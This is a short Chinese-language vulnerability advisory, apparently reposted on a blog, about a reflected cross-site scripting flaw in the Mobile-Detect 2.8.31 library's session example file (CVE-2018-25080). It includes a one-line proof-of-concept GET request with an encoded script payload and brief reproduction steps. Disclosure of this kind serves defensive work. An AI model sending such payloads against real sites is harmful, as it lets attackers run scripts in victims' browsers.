MobileDetect 2.8.31版本中的跨站脚本(XSS)漏洞分析

本文详细分析了Mobile-Detect库2.8.31版本中存在的跨站脚本(XSS)漏洞,提供了具体的概念验证(POC)和漏洞复现步骤。该漏洞源于会话示例文件对用户输入的过滤不严,可导致攻击者在受害者浏览器中执行恶意脚本。

漏洞标题:MobileDetect 2.8.31 - 跨站脚本 (XSS)

日期:2025-11-25

漏洞作者:CodeSecLab

厂商主页:https://github.com/serbanghita/Mobile-Detect/

软件链接:https://github.com/serbanghita/Mobile-Detect/

版本:4da80e5

测试环境:Windows

CVE:CVE-2018-25080

概念验证 (POC):

1

GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

复现步骤:

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次